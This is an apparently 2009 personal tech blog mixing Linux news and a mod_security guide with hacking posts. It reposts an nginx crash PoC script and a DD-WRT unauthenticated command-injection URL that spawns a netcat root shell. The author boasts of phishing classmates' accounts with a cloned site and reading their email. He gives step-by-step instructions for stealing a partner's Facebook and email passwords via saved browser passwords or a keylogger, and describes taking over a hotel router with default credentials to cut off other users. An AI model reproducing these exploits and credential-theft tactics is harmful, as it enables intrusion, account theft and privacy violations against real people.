Thursday, December 24, 2009

ClarkConnect 5



This is my ClarkConnect, here is a screenshot for you. I'm not blaming mikrotik anymore because I use it too in my office :) , but this one is free ( community edition )


Work = Net , live and Music ......

Wednesday, October 28, 2009

Centos 5.4

The CentOS team is pleased to announce the availability of CentOS 5.4. Major changes in CentOS 5 compared to CentOS 4 include:

These updated software versions: Apache-2.2, php-5.1.6, kernel-2.6.18, Gnome-2.16, KDE-3.5, OpenOffice.org-2.3, Evolution-2.12, Firefox-3.0, Thunderbird-2.0, MySQL-5.0, PostgreSQL-8.

Better desktop support with compiz and AIGLX.

Virtualization provided by the Xen hypervisor with Virtual Machine Manager and libvirt.

Major changes compared to earlier CentOS 5 versions include:

KVM as a preview for the new virtualization technology in Enterprise Linux.

ext4 as a technology preview in file systems.

Source : www.centos.org

download from local ix ( Indonesia )

http://mirror.unej.ac.id/centos/5.4/isos/i386/

Monday, October 26, 2009

Sql injection and mod security - black and white

This noon we read a mail from someone who claims he found SQL injection in our site. How can that be ... , magic quotes is still off and mod_security is not yet installed

see this article

from : http://www.cyberciti.biz/faq/rhel-fedora-centos-httpd-mod_security-configuration/

Red Hat / CentOS Install mod_security Apache Intrusion Detection And Prevention Engine

by Vivek Gite

How do I install ModSecurity - an open source intrusion detection and prevention engine for web applications under CentOS / RHEL / Red Hat Enterprise Linux 5.x server?

ModSecurity operates embedded into the web server (httpd), acting as a powerful umbrella - shielding web applications from attacks. In order to use mod_security, you need to turn on EPEL repo under CentOS / RHEL Linux. Once repo is turned on, type the following command to install ModSecurity:
# yum install mod_security
Sample output:

Loaded plugins: downloadonly, fastestmirror, priorities, protectbase
Loading mirror speeds from cached hostfile
* epel: www.gtlib.gatech.edu
* base: mirror.skiplink.com
* updates: centos.aol.com
* addons: mirror.cs.vt.edu
* extras: mirror.trouble-free.net
0 packages excluded due to repository protections
Setting up Install Process
Parsing package install arguments
Resolving Dependencies
--> Running transaction check
---> Package mod_security.x86_64 0:2.5.9-1.el5 set to be updated
--> Finished Dependency Resolution

Dependencies Resolved

Package Arch Version Repository Size

Installing:
mod_security x86_64 2.5.9-1.el5 epel 935 k

Transaction Summary

Install 1 Package(s)
Update 0 Package(s)
Remove 0 Package(s)

Total download size: 935 k
Is this ok [y/N]: y
Downloading Packages:
mod_security-2.5.9-1.el5.x86_64.rpm | 935 kB 00:00
Running rpm_check_debug
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing : mod_security [1/1]

Installed: mod_security.x86_64 0:2.5.9-1.el5
Complete!

mod_security configuration files

1. /etc/httpd/conf.d/mod_security.conf - main configuration file for the mod_security Apache module.
2. /etc/httpd/modsecurity.d/ - all other configuration files for the mod_security Apache.
3. /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf - Configuration contained in this file should be customized for your specific requirements before deployment.
4. /var/log/httpd/modsec_debug.log - Use debug messages for debugging mod_security rules and other problems.
5. /var/log/httpd/modsec_audit.log - All requests that trigger ModSecurity events (as detected) or a server error ("RelevantOnly") are logged into this file.

Open /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf file, enter:
# vi /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf
Make sure SecRuleEngine is set to "On" to protect the web server from attacks:

SecRuleEngine On

Turn on other required options and policies as per your requirements. Finally, restart httpd:
# service httpd restart
Make sure everything is working:
# tail -f /var/log/httpd/error_log

see your files in

/var/log/httpd/

modsec_debug.log
modsec_audit.log

Congratulations : Global Conference on Open Source (GCOS)

Sunday, October 25, 2009

Redirect and Phishing Facebook

Tonight was very smooth; I just opened my eyes and read the security news around the world. Facebook is the biggest social community, and people can make applications like games, quizzes, etc.

Can we phish that ?... of course ...

have u read this

http://www.packetstormsecurity.com/0910-exploits/facebook-redir.txt

_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________


# [+] Facebook Redirection
#
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
#
#[------------------------------------------------------------------------------------]
#
# [+] How use ?
#
# http://apps.facebook.com/quizzname/?next=[Redirection]
#
# [+] PoC :
#
# http://apps.facebook.com/quelendroitltwgzmv/?next=http://www.google.com
#
#[------------------------------------------------------------------------------------]

The "Redirect Method" can set a trap, be careful with your facebook account

check your nginx

http://www.packetstormsecurity.com/0910-exploits/nginx-dos.txt

debian:~# uname -a
Linux debian 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686 GNU/Linux
debian:~# cat /etc/issue
Debian GNU/Linux 4.0 \n \l

debian:~# dpkg -l|grep nginx
ii nginx 0.4.13-2+etch2 small, but very powerful and efficient
debian:~# ps xauwww|grep worker|grep -v grep
www-data 3577 0.0 0.9 2688 928 ? S 01:50 0:00 nginx: worker process
debian:~# gdb -p 3577
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
Attaching to process 3577
Reading symbols from /usr/sbin/nginx...(no debugging symbols found)...done.
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Reading symbols from /lib/tls/i686/cmov/libcrypt.so.1...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libcrypt.so.1
Reading symbols from /usr/lib/libpcre.so.3...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libpcre.so.3
Reading symbols from /usr/lib/libz.so.1...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/tls/i686/cmov/libc.so.6...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_compat.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_compat.so.2
Reading symbols from /lib/tls/i686/cmov/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnsl.so.1
Reading symbols from /lib/tls/i686/cmov/libnss_nis.so.2...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_nis.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_files.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_files.so.2
Failed to read a valid object file image from memory.
0xb7f06410 in ?? ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08068f23 in ?? ()
(gdb) bt
#0 0x08068f23 in ?? ()
#1 0x080b0540 in ?? ()
#2 0x080a54e4 in ?? ()
#3 0x00000000 in ?? ()
(gdb) i r
eax 0x6d4 1748
ecx 0xbff21028 -1074655192
edx 0x80b1794 134944660
ebx 0x80b0540 134939968
esp 0xbff21880 0xbff21880
ebp 0xbff218d8 0xbff218d8
esi 0x80b5630 134960688
edi 0x80b0540 134939968
eip 0x8068f23 0x8068f23 <__gmon_start__@plt+126827>
eflags 0x10206 [ PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) q
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: /usr/sbin/nginx, process 3577
debian:~#

in nginx error log we can see :
2009/10/15 01:53:24 [alert] 2477#0: worker process 3577 exited on signal 11

===============================

here is same test on nginx compiled with debug :

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
793 header.data[header.len++] = '.';
(gdb) bt
#0 ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
#1 0x08069c63 in ngx_http_process_request_line (rev=0x80c95d8) at
src/http/ngx_http_request.c:702
#2 0x080668ff in ngx_http_init_request (rev=0x80c95d8) at
src/http/ngx_http_request.c:446
#3 0x0805f67e in ngx_epoll_process_events (cycle=0x80a59e8, timer=60000,
flags=)
at src/event/modules/ngx_epoll_module.c:518
#4 0x08056712 in ngx_process_events_and_timers (cycle=0x80a59e8) at
src/event/ngx_event.c:245
#5 0x0805cebd in ngx_worker_process_cycle (cycle=0x80a59e8, data=0x0) at
src/os/unix/ngx_process_cycle.c:728
#6 0x0805b9b1 in ngx_spawn_process (cycle=0x80a59e8, proc=0x805c8a2
, data=0x0,
name=0x808e46b "worker process", respawn=-2) at
src/os/unix/ngx_process.c:187
#7 0x0805c470 in ngx_start_worker_processes (cycle=0x80a59e8, n=1, type=-2)
at src/os/unix/ngx_process_cycle.c:327
#8 0x0805d442 in ngx_master_process_cycle (cycle=0x80a59e8) at
src/os/unix/ngx_process_cycle.c:119
#9 0x0804ae5b in main (argc=1, argv=0xbfd72ac4) at src/core/nginx.c:332
(gdb) i r $eip
eip 0x8068e52 0x8068e52
(gdb)

===============================

tested on versions 0.7.0 <= 0.7.61, 0.6.0 <= 0.6.38, 0.5.0 <= 0.5.37, 0.4.0
<= 0.4.14

================================
here is POC:

#!/usr/bin/perl
use IO::Socket;
if ($#ARGV != 0) {
print "Usage: ./nginx.pl \n";
exit;}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
$mysize = 4079;
$mymsg = "o" x $mysize;
print $sock "GET /$mymsg HTTP/1.1\r\n\r\n";

while(<$sock>) {
print;
}


I tried checking my nginx version, see this

[root@vx066-findtoyou-cen ~]# rpm -qa | grep nginx
nginx-0.6.39-1.el5
[root@vx066-findtoyou-cen ~]# vi nginx.pl
[root@vx066-findtoyou-cen ~]# vi nginx.pl
[root@vx066-findtoyou-cen ~]# perl nginx.pl 127.0.0.1
HTTP/1.1 400 Bad Request
Server: nginx/0.6.39
Date: Sat, 24 Oct 2009 20:29:33 GMT
Content-Type: text/html
Content-Length: 173
Connection: close

[root@vx066-findtoyou-cen ~]# ./nginx.pl 127.0.0.1
bash: ./nginx.pl: Permission denied
[root@vx066-findtoyou-cen ~]# chmod +x nginx.pl
[root@vx066-findtoyou-cen ~]# ./nginx.pl 127.0.0.1
HTTP/1.1 400 Bad Request
Server: nginx/0.6.39
Date: Sat, 24 Oct 2009 20:30:06 GMT
Content-Type: text/html
Content-Length: 173
Connection: close


and please check your nginx now :) .........
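
A version check for the advisory above, as an added example that is not part of the original post or the advisory: it pulls the upstream version out of a `Server:` header, an `rpm -qa` name or a `dpkg -l` line and compares it with the ranges on the advisory's "tested on versions" line. The function names are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Ranges copied from the advisory's "tested on versions" line:
 * 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14. */
struct tested_range { int major, minor, patch_lo, patch_hi; };

static const struct tested_range TESTED[] = {
    {0, 7, 0, 61},
    {0, 6, 0, 38},
    {0, 5, 0, 37},
    {0, 4, 0, 14},
};

/* Parse "x.y.z" at p into v[0..2]; trailing text such as "-1.el5" is
 * ignored. Returns 0 on success, -1 if p does not start with a triplet. */
static int parse_triplet(const char *p, int v[3])
{
    for (int i = 0; i < 3; i++) {
        char *end;
        long n;

        if (!isdigit((unsigned char)*p))
            return -1;
        n = strtol(p, &end, 10);
        if (n > 9999)               /* also catches overflow (LONG_MAX) */
            return -1;
        v[i] = (int)n;
        p = end;
        if (i < 2) {
            if (*p != '.')
                return -1;
            p++;
        }
    }
    return 0;
}

/* Look for a version after any occurrence of "nginx" ("nginx/0.6.39",
 * "nginx-0.6.39-1.el5", "nginx 0.4.13-2+etch2"); fall back to a bare
 * "x.y.z". Returns 0 on success, -1 if no version was found. */
int parse_nginx_version(const char *s, int v[3])
{
    const char *p = s;
    const char *hit;

    while ((hit = strstr(p, "nginx")) != NULL) {
        const char *q = hit + 5;

        while (*q == '/' || *q == '-' || *q == ' ' || *q == '\t')
            q++;
        if (parse_triplet(q, v) == 0)
            return 0;
        p = hit + 5;                /* e.g. skip "nginx version: " */
    }
    return parse_triplet(s, v);
}

/* 1: version is inside a range the advisory lists as tested,
 * 0: version parsed but outside those ranges,
 * -1: no nginx version could be parsed from the string. */
int nginx_in_tested_range(const char *s)
{
    int v[3];

    if (parse_nginx_version(s, v) != 0)
        return -1;
    for (size_t i = 0; i < sizeof TESTED / sizeof TESTED[0]; i++) {
        const struct tested_range *r = &TESTED[i];

        if (v[0] == r->major && v[1] == r->minor &&
            v[2] >= r->patch_lo && v[2] <= r->patch_hi)
            return 1;
    }
    return 0;
}

int main(void)
{
    /* First three strings are taken from the sessions on this page;
     * the last one is constructed for the example. */
    static const char *samples[] = {
        "Server: nginx/0.6.39",
        "nginx-0.6.39-1.el5",
        "ii nginx 0.4.13-2+etch2 small, but very powerful and efficient",
        "nginx version: nginx/0.7.61",
    };

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-64s -> %d\n", samples[i], nginx_in_tested_range(samples[i]));
    return 0;
}
```

A result of 1 only says the upstream number falls in a range the advisory tested; distribution packages can carry backported fixes under the same upstream version, so confirm against the vendor changelog.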

Saturday, September 05, 2009

Hacking Sms Centre

This story began when I had a nokia 3330 series phone, joined a forum community and got information about seeking sms centres in this country. In 2003 indonesia had three cellular operators, telkomsel, indosat and proxl, and I had a collection from all three, hmm maybe 10 sim cards among my stuff

For about 5 hours per day I was seeking sms centres with my old nokia phones.


Bingo, my seeker found one sms centre :... Indosat : +62855000904-906 ( im3 ). The enigma: I got a charge of Rp -5.000.000 ( im3 ) LOL hahahahahaha

but now it is closed and not free anymore ...

download : http://smsclist.com/downloads/

There are thousands of sms centres in this world, be patient when seeking. I'm just sharing this for educational purposes only; these days sending a message by sms is, I think, very cheap, and it is your choice ...

greets to : fulvian , crushbonez for sharing this software

Thursday, August 13, 2009

Lack connection

About 1 day ago, the internet in this office was like a snail, what is going on. I tried to remote into 10 servers but had the same problem, hmmm maybe an earthquake again and it's true

Disaster

read this :

Asian undersea cable disruption slows Internet access


By Sumner Lemon
IDG News Service (Singapore Bureau)
August 13, 2009

SINGAPORE - A segment of the Asia-Pacific Cable Network 2 (APCN2) undersea cable network between China and Taiwan suffered a serious cable fault on Wednesday, causing Internet traffic to be rerouted onto other undersea cables and slowing Internet access for some users in Southeast Asia.

At about 10:50 a.m. on Wednesday, local time, an alarm signaled a cable fault on Segment 7 of APCN2, which connects Hong Kong and Shantou, China. The disruption caused a temporary loss of service on the undersea link but all customers that use the cable were soon shifted to capacity on other cables, according to a source familiar with the situation.

The APCN2 cable is owned by a consortium of 26 telecom operators from 14 different countries. The cable links Singapore, Malaysia, the Philippines, Hong Kong, Taiwan, China, South Korea and Japan.

The exact cause of the APCN2 fault was not immediately known. The alarm indicated the disruption was caused by a “single point of failure,” which suggests a variety of possibilities, including a technical failure or a cable cut, the source said. One cause can apparently be ruled out: Taiwan’s Central Weather Bureau did not record signs of seismic activity around the time that the alarm was received.

The incident was likely the main reason that Internet access appeared slower for some users in Singapore on Wednesday, the source said.

Undersea cables are used to transport much of the world’s Internet traffic and can be easily damaged by natural disasters or other causes. In 2006, a powerful earthquake off the southern coast of Taiwan damaged several cables and slowed Internet access to a crawl for users in Southeast Asia.

Singapore Telecommunications (SingTel), which is an investor in APCN2, said its users may experience slower Internet access than normal to some U.S. Web sites, blaming the APCN2 fault on damage caused by Typhoon Morakot.

“The [APCN2] consortium members have started restoration works, and our engineers are in the process of diverting Internet traffic to other cable systems. We expect the situation to return to acceptable levels within the next 24 hours,” SingTel spokesman Chia Boon Chong, said in an e-mail statement.

A spokesman for Starhub, another Singapore ISP that holds a stake in the cable, did not return a phone call seeking comment.

The fault that hit APCN2 on Wednesday follows two other service disruptions that recently hit the network. One disruption affected APCN2 Segment 7, between Hong Kong and Taiwan, and the other affected APCN2 Segment 1, which connects Singapore and Malaysia. However, both of these disruptions were deemed to be “relatively minor” compared to the disruption that took place Wednesday morning, the source said.

The cause of the two earlier faults on APCN2 was not immediately clear.

APCN2 isn’t the only Asian undersea cable currently suffering from a service disruption.

“The Cable & Wireless Real Time Operations Team have logged multiple cable breaks on APCN2, APCN, EAC and SMW3 in Asia Pacific — specifically, near Taiwan. Network traffic flow has been adversely affected in and out of the region as a result,” said Gavin Tait, director of Asia network planning and implementation at Cable & Wireless, in an e-mail statement provided by the company.

None of Cable & Wireless’ customers were affected by these failures, he said.

Efforts are currently underway to repair the East Asia Crossing (EAC) undersea cable after it experienced “double faults” off the coast of Taiwan last weekend, according to Roland Lim, a spokesman for Pacnet, which owns EAC.

The first sign of damage to the EAC cable off the coast of Taiwan came on Aug. 9 at 1:37 a.m., local time, when an alarm signalled that service on EAC Segment D, which links Taiwan and Hong Kong, had been disrupted, Pacnet said in an Aug. 10 Network Event Notification that was obtained by IDG News Service. At the time, traffic on Segment D was transferred to EAC Segment C. However, Segment C suffered a second disruption roughly twelve hours later.

The cause of the faults that hit the EAC cable between Hong Kong and Taiwan is not yet known, but the damage happened at about the same time the southern part of the island and China’s southern coast was being pummeled by one of the most powerful typhoons to strike in recent memory. There were no earthquakes recorded by Taiwan’s Central Weather Bureau at the time when the disruptions took place.

original link
http://computerworld.com.ph/tag/apcn-2/


By Dan Nystedt
IDG News Service (Taipei Bureau)
August 13, 2009

TAIPEI - Deep sea landslides caused by Typhoon Morakot severed at least three undersea fiber-optic telecommunications cables and disrupted three others, causing Internet service disruptions in parts of Asia.

The SWM-3 (Southeast Asia - Middle East - Western Europe 3) cable that connects to Taiwan near the east coast city of Taitung was first hit by undersea landslides on August 9 as Typhoon Morakot approached the island, according to a statement from Chunghwa Telecom, Taiwan’s largest telecommunications provider.

On Wednesday, further undersea landslides caused by Morakot severed two more undersea fiber optic cables, APCN (Asia Pacific Cable Network) and APCN2, the company said.

The cable breaks disrupted Internet and telecommunications connectivity to China and parts of Southeast Asia, including Singapore, the Philippines and Hong Kong, but Chunghwa was able to restore service quickly by using backup systems and rerouting traffic to other cables.

The three other cables disrupted by undersea landslides were the C2C Cable Network East Asia Crossing (EAC), C2C Cable Network (C2C) and FLAG (Fiber Optic Link Around The Globe) North Asia Loop (FNAL).

Chunghwa said it has already sent workers to assess damage and begin repairs on the undersea cables. The company was unable to immediately say when the cables might be mended. To keep Internet and telecommunications flowing in the region, Chunghwa has been in contact with other telecommunications service providers and rerouted traffic on unaffected cables.

The company warned that unaffected cables carrying additional Internet and telecommunications traffic may not be able to handle all normal traffic flow, thereby causing slow service at some times.

Undersea fiber optic cables carry the bulk of the world’s Internet and communications traffic. Natural disasters such as earthquakes and deep sea landslides can disrupt the cables.

Typhoon Morakot killed 103 people in Taiwan, according to government figures, and officials expect the toll to continue to rise. The military and police were on Wednesday able to save 700 people stranded in mountain villages near the southern city of Kaohsiung after landslides and mud flows engulfed entire towns, including Cishan Township. Thousands remain stranded in disaster areas and rescue work continues.

Taiwan’s Council of Agriculture estimates the typhoon destroyed NT$9.01 billion (US$273.9 million) of crops and other goods.

http://computerworld.com.ph/typhoon-morakot-severs-three-undersea-internet-cables/

Thursday, August 06, 2009

inspiration will not end its just beginning ...



It's now 6.30 PM, I'm still in front of the computer, preparing the monthly report and spending a little time listening to this music; it makes me relax for a while, running with 18 remote shell boxes. Is she a superstar ? I say yes ... remembering .....


Aphrodite ...

Tuesday, August 04, 2009

Have u tried gOS ??



Improving the Linux user experience...

Since our debut in 2007, gOS has been praised for being the most beautiful and easiest to use Linux operating system on the market. Now with our third and best version of gOS, we have carried on our effort to create a Linux for the rest of us.

..with Google Gadgets

Turn on your computer to a desktop full of your favorite widgets, fresh with live, personalized content just for you. We want to personally thank the Google Gadgets for Linux team for their efforts.

Read this :

http://www.thinkgos.com/gos/download.html


last release : gOS 3.1 Gadgets (SP1)

have u tried gOS ??

Search Wiki From Shell Box

If you have a shell box ( unix ) you can search the wiki with a simple command like this


dig +short txt .wp.dg.cx

as example :

dig +short txt indonesia.wp.dg.cx



source :

http://lifehacker.com/5329014/search-wikipedia-from-the-command-line

just spend a little time

I heard this song in 1993; it is taken from the album Format Masa Depan - Dewa 19. I'll remember this story, I'm just spending a little time sharing my story ...



Ten Story love Song - Indonesian Love Song .......

Monday, August 03, 2009

Simple Trick to disconnect Yahoo Messenger

I have a simple trick for how to make a friend in your list disconnect. First of all

You can broadcast message like this :

Secret of Yahoo messenger 9

in your “type some contact information” you can input this :

http://us.lrd.yahoo.com/_ylc=X3oDMTIxN3RkOTNuBF9TAzM5ODMwMDk2NwRwb3MDMgRzZWMDbndfdG9wc3RvcmllcwRzbGsDdGl0bGUEdGFyA25ld3MueWFob28uY29t

and press enter , you will find the big secret of Yahoo messenger 9 .

hope you enjoy it ...


==============================================================



I think yahoo messenger has a bug ...

http://us.lrd.yahoo.com/_ylc=X3oDMTIxN3RkOTNuBF9TAzM5ODMwMDk2NwRwb3MDMgRzZWMDbndfdG9wc3RvcmllcwRzbGsDdGl0bGUEdGFyA25ld3MueWFob28uY29t

If you browse to this site, the page cannot be found, and it's not a worm :) , LOL

Hack Affiliate Program

This happened 4 years ago ... , when I was still a student at university. As a student I was really really happy when I had a new phone, yeah ... a new phone product from nokia, the 3330. But what about the voucher ? What could I do to buy one ? It was very expensive; in that era telecommunications was a monopoly, only an operator that had power could join the market.

OK, at this point I'll give you the story. In 2005 voucher affiliate programs were popular. I searched google with the key : topup.com ( as the example ); there were many people promoting this affiliate, wow great, I got this idea ....

second method : social engineering. I had one site, owned by me with id=root;
I just copied topup.com and made the same face for it hehehe , LOL , and sent the victim to browse my shit site ...

username : blablabla
password : bla bla bla

and finally, I got 100 accounts hehehehe LOL ( I tried this method on the class mailing list and it worked LOL and I could read their inboxes ) sorry dude

ok back to the topic again ...

next step .. I logged in to the topup.com site and I could top up my voucher and call everyone and it's freeee ... ( balance = rp 300.000 )... hehehehe

This is for educational purposes only ... I'm just sharing the experience with everyone ...

Friday, July 31, 2009

Good man in the good place

Hip hip hooray, I got my small bag back, including the laptop charger and hp charger; I thought it was lost for a while. My stuff got lost when I was going to the train station by taxi. I realized it when I was at the train station. I tried not to panic. Just thinking for a while ...

I remembered that my small bag had a guest bill in it, complete with my address. On Friday night when I was going home I got a package and I saw his name.

I called him and said thanks for giving back my stuff. I know he is a good man ...

Special Big Thanks to : Mr Arifin ( Taxi driver ) for giving back my stuff.

if u wanna get Taxi Driver in Semarang City - Indonesia , you can contact him : 6285225336158

www.findtoyou.com

www.findtoyou.com, this site is owned by k1n9k0ng; besides this one, he made finderonly. What can you get from this site ?

you can find rapidshare links, find megaupload, find pdf files, with the crawler method

and do you know who he is ?

he is a top blogger in indonesia, read this.

screen shot :



wanna try ?

Wednesday, July 29, 2009

Backtrack ...

Backtrack is a linux distro derived from slackware, a merger of WHAX and the Auditor Security Collection. Backtrack 2 was released on 6 March 2007 and includes more than 300 security tools, while the beta 3 version of backtrack was released on 14 December 2007; the third release is more focused on hardware support. Backtrack 3 was released on 19 June 2008; version 3 includes saint and maltego, while nessus is not included, and it still uses kernel version 2.6.21.5.

Official site links:

http://www.remote-exploit.org/backtrack.html

The Indonesian version can be read at the link below; coincidentally I have followed its articles:

http://indobacktrack.or.id/

Greets to: Indobacktrack Team

If you have trouble downloading the backtrack live CD, it can be downloaded here

http://repo.opensource.telkomspeedy.com/backtrack/

Happy learning .... smile


Source:
http://id.wikipedia.org/wiki/BackTrack

Last edited by thesims (24-07-2009 15:17:35)

Invisible ???

Do you hate it when someone is usually invisible in your contact list ? This is the solution, we made this on the opensource server. Hope you enjoy :


http://opensource.telkomspeedy.com/ym/


greets to : http://opensource.telkomspeedy.com

Sunday, July 26, 2009

Hooray ... I have a hotspot at Santika Hotel

At exactly 9:32 I opened my laptop; it feels like a long time since I left my beloved internet ( drama mode on hehehehe ). I scanned for fun .. and found a hotspot, not bad, free and fast too. Then at 11 o'clock people started flocking in to eat, and the sound of plates and so on was really loud here. Suddenly I got a phone call: "Bal, there is a problem with the server". So I quickly remoted into the shell box ... oh my, why is the access so slow ... I have to fix this ... , so I had to go out to survey, looking around, and it turned out, friend, that a lot of people were using laptops. So how could I get my remote session ? In the end I went back to my room to meditate and do a modest ritual

I tried browsing to www.showmyip.com

the IP is 125.x.x.x ( I think I know this IP ) and I was sure the password was the

default :

user : admin
password : admin

then I typed in cmd ( ubuntu is in kernel panic at the moment, so I made do with vista, and only because I had to :) )

C:\Users\iqbal>ipconfig

Wireless LAN adapter Wireless Network Connection:

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::30e2:cefa:6c53:6ca3%14
IPv4 Address. . . . . . . . . . . : 192.168.1.5
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

there, the gateway shows up

open

http://192.168.1.1

enter the user name and password above ...

here is the screenshot

In the end I cut all the wireless client connections first, so that I could remote into the box; I had to sacrifice dozens of people rather than tens of thousands :)

It did not stop there, I changed the default password rather than have it taken over and then need it and not be able to connect to the internet.

After 10 minutes the problem was solved :) then I opened it up again .. I felt sorry for those who want to use it .... , I only cut off the ones with heavy traffic, after all I use it too ... the important thing is I did not set up 128-bit WEP, as Afgan would say - cruel

So, if you want the password to http://192.168.1.1 and are staying at Santika - Semarang, just message me ...

somehow this hotel feels like my own today ... well, what else can I do ...

hack into inbox ...

This does not teach a crime; the word "hack" does sound scary, but it is a bit more ordinary than that. It all starts with social engineering; even though she is still a mystery, I could break into an email. A facebook inbox can also be used for social engineering ( the contents of the inbox, an affair, a rival, or she already has someone hehehehe, everything is revealed ... ). For example, you want to win over a girl, and this girl likes facebook; usually a person is too lazy to type a password, so the password gets saved in mozilla


if the laptop is yours

1. your hands have to be quick to save the facebook password; get her to open facebook in mozilla, and quickly save it hehehe, the same goes for email ... ( remember password in mozilla )

how to view it

tools - options - security - save password , show password

2. prepare your weapon, a keylogger; there are many effective ones. Invite her to open fb, then pretend to go buy cigarettes, go out, or go to the toilet

if the laptop is hers

1. install mozilla first; if it is not there, have her download it or download it yourself.
The point here is to get her to log in to facebook or email. Remember, man !!! say it with a sweet line : "just click remember password so you remember it, dear" or whatever, your own style is fine too. Then keep her playing in front of the computer, and hold out until she gets bored ( would she really stay in front of the computer; here your endurance has to be strong ... practice sitting in front of the computer but stay relaxed ). She will surely go off somewhere, then hurry and click in mozilla

tools - options - security - save password , show password ( memorize it quickly )

now you have the login and password, and you can read ...


sorry, I am not inviting anyone here to become possessive

like the blog of bro bung ian

http://kei-kai.blogspot.com/2008/10/ternyata-pacar-posesif-itu-nyata.html

Thursday, July 23, 2009

The Elder Says: Read Google .......

For the thousand-and-somethingth time I have told my friend: search on google. What is so hard about searching on google, when it is so easy, just "open google, all the knowledge is piled up there, until you get feverish :D if you study there", that is what my elder says. The mighty, all-powerful arts, whose
items are : from looking for small targets up to giant targets, spamming, peeking here and there, collecting thousands of emails that contain nothing but botnets, getting into the neighbour's wifi, deauth here and there, wardriving in hotspot areas, opening backtrack and finding a hole, looking for a local exploit, targeting root and planting a backdoor. And on the
white side you can get : installing a network, routing with squid, using nginx, tinkering with cisco routers, tracing where the link is broken, bgp, ospf, RIP routers, java, josso, jboss, creating vhosts, dns servers, mail servers with zimbra, and a lot more. So now just choose what you want to become. For experience it is fine to learn it all; use it for good, it is hard to create ... now it is just a matter of each person's creativity and how much time you set aside for all of it :) at least 12 hours in front of a computer + internet is enough ...

Wednesday, July 22, 2009

DD-WRT (httpd service) Remote Command Execution Vulnerability

This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
at the latest 24 sp1 version of the firmware.

The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:

    if (containsstring(file, "cgi-bin")) {

        auth_fail = 0;
        if (!do_auth
            (conn_fp, auth_userid, auth_passwd, auth_realm,
             authorization, auth_check))
            auth_fail = 1;


......... (snip)............


        }
        exec = fopen("/tmp/exec.tmp", "wb");
        fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
        if (query)
            fprintf(exec, "/bin/sh %s/%s
                    server_dir != NULL ? server_dir : "/www", file);
        else
            fprintf(exec, "/%s/%s\n",
                    server_dir != NULL ? server_dir : "/www",
                    file);
        fclose(exec);

        if (query) {
            exec = fopen("/tmp/exec.query", "wb");
            fprintf(exec, "%s\n", query);

........................
Two issues there:
1) No metacharacters handling
2) Command gets executed even without successful authentication.
You are not going to see any output if not authenticated though.
.......................

            free(query);
            fclose(exec);
        }

        system2("chmod 700 /tmp/exec.tmp");
        system2("/tmp/exec.tmp>/tmp/shellout.asp");

........... (snip)..........

        if (auth_fail == 1) {
            send_authenticate(auth_realm);
            auth_fail = 0;

------------

3) issue 3: httpd runs as root :)



Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can get easily root on the device via
his browser with an URL like:

http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
becomes as easy as typing this in your browser's url bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:




Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI which is bad, bad). However, a base authentication dialog will appear. In
IE even this can be suppressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

